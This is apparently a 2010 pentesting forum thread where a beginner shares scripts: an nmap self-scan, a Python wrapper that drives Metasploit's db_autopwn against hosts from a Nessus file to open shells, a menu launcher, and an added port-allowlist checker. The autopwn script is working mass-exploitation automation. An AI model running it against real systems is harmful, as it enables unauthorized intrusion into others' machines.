Thread: Newbie Scripts

  1. #1
    Just burned his ISO Track404
    Join Date
    Nov 2009
    Posts
    23

    Newbie Scripts

    I'm currently using this script on the Ubuntu 9.10 side that will port scan an assigned IP Address after it shuts down services that I have installed. I thought maybe some of you newbies may have a use for the scan side of it.

    #!/bin/sh
    # auto nmap inet addr
    # Pull the IPv4 address assigned to eth0 out of the ifconfig output.
    var=$(expr "`ifconfig eth0`" : '.*inet addr:\([^ ]*\).*')
    # Scan every TCP port on that address.
    sudo nmap "$var" -p 1-65535
    echo " "
    echo Press enter to quit
    read enter

    *Remember to save the script.sh and allow it to execute as a program under permissions.

    If you're a Newbie like me, I know you love Metasploit's Autopwn feature. If you browse your Fasttrack directory, /home/USER/fasttrack/bin/ftsrc in my case, you will find a file named autopwn.py which begins the magic.

    So I figured why not use that python script to autopwn a Nessus.nbe. To give you an idea, here's a cut out example:

    import pexpect

    try:
        child1 = pexpect.spawn('/opt/metasploit3/msf3/msfconsole')
        # load sqlite3
        child1.sendline('db_driver')
        # child1.sendline('load driver sql3')
        # Destroy database
        child1.sendline('db_destroy client')
        # Create database
        child1.sendline('db_create client')
        # import nbe
        child1.sendline('db_import_nessus_nbe /home/USER/Desktop/victim.nbe')
        # run actual exploitation
        child1.sendline('db_autopwn -t -e -x -p')
        child1.sendline('sleep 5')
        child1.sendline('jobs -K')
        child1.sendline('\n\n\n')
        child1.sendline('sessions -l')
        child1.sendline('echo "If it states No sessions, then you were unsuccessful. Simply type sessions -i <id> to jump into a shell"')
    except pexpect.ExceptionPexpect as err:
        print("msfconsole session failed: %s" % err)

    *Remember the extension is .py

    You can even create a script.sh and call it autopwn where you can select Nmap/Nessus

    #!/bin/sh
    echo
    echo Metasploit Autopwn
    echo
    echo "1) NMAP Autopwn"
    echo "2) Nessus Autopwn"
    echo "3) quit"
    echo
    read -p "Enter a number : " n
    # Quote $n so an empty or multi-word answer does not break the test.
    if [ "$n" = 1 ]; then
        sudo python /home/USER/fasttrack/bin/ftsrc/autopwn.py
    elif [ "$n" = 2 ]; then
        sudo python /home/USER/fasttrack/bin/ftsrc/Nessusautopwn.py
    elif [ "$n" = 3 ]; then
        exit
    else
        echo "$n is not a number."
    fi
    echo
    echo Press enter to quit
    read enter

    I guess I'll end with a bit of color script:

    #!/bin/bash
    echo " "
    echo -e '\E[34;40m' "To add color to your scripts ask google he's your friend"; tput sgr0

    echo " "
    echo Press enter to quit
    read enter

    Anyway, I just wanted to give the Newer Newbies an idea of some scripts and how useful and fun they can be.

    Thank you Remote-Exploit for allowing the average computer user to acquire pentesting tools and for giving us the knowledge to use them.
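
The first script in the post scans the machine's own address after services have been shut down. As an added example (not part of Track404's post), the check below turns that scan into a pass/fail test by listing any open port that is not on an allowlist; the function names `unexpected_open_ports` and `sample_scan` and the sample data are constructed for illustration.

```shell
#!/bin/sh
# Added example: report ports nmap found open that are not on an allowlist.
# Input is nmap "grepable" output (nmap -oG -), read from stdin.

# Usage: unexpected_open_ports "22 80" < scan.gnmap
# Prints one "port/proto" line for every open port not in the allowlist.
unexpected_open_ports() {
    awk -v allow="$1" '
        BEGIN {
            n = split(allow, a, " ")
            for (i = 1; i <= n; i++) ok[a[i]] = 1
        }
        /Ports:/ {
            # Keep only the text after "Ports: " and before the next tab field.
            line = $0
            sub(/.*Ports: /, "", line)
            sub(/\t.*/, "", line)
            m = split(line, entries, ", ")
            for (i = 1; i <= m; i++) {
                # Each entry: port/state/proto/owner/service/rpc/version/
                split(entries[i], f, "/")
                if (f[2] == "open" && !(f[1] in ok))
                    print f[1] "/" f[3]
            }
        }
    '
}

# Constructed sample of grepable output (not from a real scan).
sample_scan() {
    printf 'Host: 192.0.2.10 ()\tStatus: Up\n'
    printf 'Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 631/closed/tcp//ipp///, 3306/open/tcp//mysql///\tIgnored State: filtered (65531)\n'
}

# Run the check on the sample only when called with the argument "demo".
if [ "${1:-}" = "demo" ]; then
    leftover=$(sample_scan | unexpected_open_ports "22")
    if [ -n "$leftover" ]; then
        echo "Still listening after shutdown:"
        echo "$leftover"
        exit 1
    fi
    echo "Only allowlisted ports are open."
fi
```

To check a live scan of your own host, pipe `sudo nmap -p 1-65535 -oG - "$var"` into `unexpected_open_ports` with the ports you expect to stay open.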

  2. #2
    Senior Member Nick_the_Greek
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Track404,
    you are on the right road.

    Give us something more advanced. You can do it better.
